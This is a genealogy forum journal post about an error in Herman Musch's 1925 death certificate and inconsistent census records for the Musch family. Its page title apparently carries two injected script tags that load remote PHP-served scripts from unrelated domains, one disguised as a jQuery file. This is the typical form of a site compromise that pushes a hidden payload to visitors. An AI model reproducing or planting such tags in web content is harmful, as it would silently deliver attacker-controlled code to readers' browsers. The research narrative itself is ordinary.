Herman Musch b.1856 d.3/3/1925 Death Cert. ERROR!!<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Herman Musch b.1856 d.3/3/1925 Death Cert. ERROR!!

Journal by gravedigger9gen

Most of these Musch's give us undo rest as we have yet to find mothers for Herman and his siblings. The father is Jacob Musch b. 1818 in Germany-Prussia, according to ship log "Koln" arriving 1873.
The death cert. for Herman states his father is Herman...this is an ERROR.
As i have tried to prove a father for this Herman , as Herman and it can NOT be done. If you follow the records of the arrival and the census records throughout his life, his father is Jacob! This is also availble through the obit for Jacob.

It is amazing to me that throughout the search, over the last 4 yrs has been intense, that the persons taking the info for census did not see the the future use of this info. If they had considered the value of such information I think they would have tried to be a little more precise in all areas but especially NAME!!.

For instance: Herman's wife, Johanna Bliss, sometimes is listed as Anna, or Annie. Then later in life she dies and it took me a year and ahalf to figure out the woman now listed in the census was not the same woman. Then the new woman Albertine once is listed as wife thenlater as cousin, come to the conclusion she is neither, she was his mother in law, yes Johanna's mother. What a surprise!!

On Each of the census records I have tracked and they are the same persons as yrs before, i know because of city index reports, I think someimes they used a nickname or shortened the first name and the spelling is out of this world sometimes. It has taken many hours to decipher the work of some transcriber who most of the time was foriegn born as well.

We have photos of this family and are always looking for more as well as our relatives of the Besewski Family.
Searching searching searching !!

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by gravedigger9gen Profile | Research | Contact | Subscribe | Block this user
on 2009-01-31 03:24:07

gravedigger9gen has been a Family Tree Circles member since Jan 2009. is researching the following names: MUSCH, , BIEBLE and 8 other(s).

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